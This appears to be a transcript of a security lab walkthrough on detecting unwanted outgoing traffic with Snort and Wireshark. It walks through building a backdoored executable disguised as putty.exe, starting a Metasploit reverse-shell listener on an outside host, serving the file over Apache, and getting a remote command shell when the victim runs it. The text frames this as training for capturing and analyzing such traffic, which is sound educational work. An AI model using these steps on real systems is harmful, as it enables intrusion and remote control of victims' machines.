Hi, welcome back to Network Security Lab Series Lab 9, Intrusion Detection Using Snort Walkthrough. We're coming back to Lesson 4, Detecting Unwanted Outgoing Traffic. While internal threats like insiders are very real, the threats from attackers on the internet are also very real. If an employee on the inside of a company's network is caught performing malicious actions on the network, they might be fired or face criminal prosecution. An attacker from the internet may not have to face any recourse because they might live in an area in the world where they are out of your jurisdiction. Lesson 4.1 Using Wireshark. In this exercise, we will use Wireshark to capture the network traffic and then analyze the PCAP file with Snort. Snort can analyze PCAP files for most sniffer programs. Type the following command to start the sniffer on the Windows 2008 sniffer internal interface. We still have those windows open from the previous lab, so I'm just going to click on the Windows 2008 sniffer and then go back to the terminal. And underneath our previous command for the kwrite alert for analyzing the data, we're going to go ahead and type in our next command, which is tcp dump -i eth0 -nnttt -s 0 -w space bad traffic .cap and hit enter. In order to create the malicious software that will be used by an internal network user, perform the following steps on the Backtrack 5 external machine. We're going to open the Backtrack 5 external machine by clicking on the Backtrack 5 icon on the topology. We're already logged in, so I'm going to go ahead and skip part 1 and move on to step 2. We're going to double click on the msfencode.txt file on the desktop. And then at the pop-up window, we're going to click on display. From here, step 3 says to click the edit menu item and choose select all. We're copying this code, so we're going to right click and select copy. At step 5, we're going to open a terminal by clicking on the picture to the right of the word system in the taskbar on the top of the screen. And then we're going to select edit from the terminal menu bar and select paste. The MSF payload command will then appear on the terminal. Press enter key to generate the executable with the malicious backdoor. Then we're going to type the following command to launch the Metasploit MSF console. All one word, lowercase. Hit enter. To use the multi-handler with Metasploit, type the following command. After it loads, you should get a screen similar to this, and you should see it change to MSF and then an arrow. From here, this is where we're going to type in the rest of the command. Use exploit /multi/handler and hit enter. To use the multi-handler with Metasploit, type the following command. Set space lhost space 216.1.1.100 and hit enter. Then we're going to set the listening port to 443 by typing the following command: set space lport space 443 and hit enter. Step 13, it says set the payload to a reverse Windows command shell by typing the following: set space payload space Windows /shell /reverse _ TCP and hit enter. Seems I might have typed reverse wrong. So let's type that again. Set payload Windows /shell /reverse _ TCP. That looks right. Hit enter. On step 14, now we're going to type in show options to verify everything is correct. lhost should be 216.1.1.100 and lport should be 443. To begin listening on port 443, type exploit and hit enter. Now we're going to start Apache, and to do this we're going to start by selecting the backtrack from the applications menu bar. So up on the top left you'll see applications, select that, select backtrack, then go to services on the next drop down, then go to HTTPD to the next drop down, and then Apache Start to the last drop down. You're going to see a window appear and it's going to close fairly quickly. And at step 17 we're going to open another terminal window by clicking on the picture to the right of the word system in the taskbar in the top of the screen. I'm going to bring this over to the side here. And from here we're going to type netstat-10 and hit enter. Now it says after starting Apache, the backtrack system is now also listening on port 80, which is true. You can see it here. Now we're going to copy the malicious file to the web root of the backtrack by typing the following: cp space putty.exe space /var /www / and hit enter. Now we're going to verify the malicious file is present in www by typing the following: ls for list space /var /www, which is the path in which this root file is located, and then hit enter. And we're going to see putty.exe listed. Now we're going to click on the Windows 2008 Server internal machine. I'm going to go to the topology for this. So the Windows 2008 internal machine should be this one here. We don't need to log in because we were already logged in previously. So if you need to, just follow steps 21 and 22. Since I'm already logged in, I'm going straight to step 23 and double clicking on Internet Explorer. And I'm going to type the following. This is very specific, so make sure you type this out correctly. It's http://216.1.1.100 /putty.exe. Someone may go to a URL such as this because of a social media post, a spearfish email, or they might wind up there after using a search engine. When you get the pop-up, go ahead and click Run, and then click Run again when you are warned about the unverified publisher. PuTTY program will open on the internal Windows 2008 server. Now we're going to click on the Backtrack 5 external machine and return to the terminal open in Metasploit, and then view the connection to the victim. So Backtrack 5 external machine. So on the exploit window, we're going to type the following command to test the connection to get a directory listing. It will be uppercase C, colon, backslash, uppercase U, lowercase SERS for users, backslash, administrator, let me try that again. That was capital C, colon, backslash, users, backslash, administrator, backslash, desktop, arrow, and then dir. There we go. My apologies, I typed it out incorrectly the first time. Now, as you can see, we're able to look at information about this particular directory, the volume, serial number, and so on. Now we're going to return to the Windows 2008 sniffer and press Ctrl-C. This will stop the TCP dump program. Next, we're going to type in Wireshark, space badtraffic.cap, and hit enter. Now, in the filter, we're going to type in frame contains quotation mark Microsoft Windows, end quote, and then we're going to select apply. Now we're going to right click on the stream packet that is displayed and select follow TCP stream. As you can see, it recorded all the previous text and paths that I had entered incorrectly and then correctly. So in conclusion, Wireshark can be used to analyze and capture network traffic. Filters can be used to look for certain IP addresses, protocols, or phases within a capture file. The filter frame contains Microsoft Windows can help to locate Windows command shells and traffic. Just to close up, our last discussion questions. Question 1. Where do you go in the Backtrack menu to start the Apache server? You have to open the Applications menu on the top left-hand corner, which will give you a number of drop-downs. This will include Backtrack, Services, HTTPD, and then you can select Start Apache. Question 2. How can you verify that a machine is listening on port 80? In the terminal window, you're going to use the netstat command. Now, what filter in Wireshark will allow you to view Windows command shell? In the filter window, you're going to type in frame contains, quotation, Microsoft Windows, end quotation. And last but not least, where is the default web root directory located in the Backtrack Linux? That will be the path /var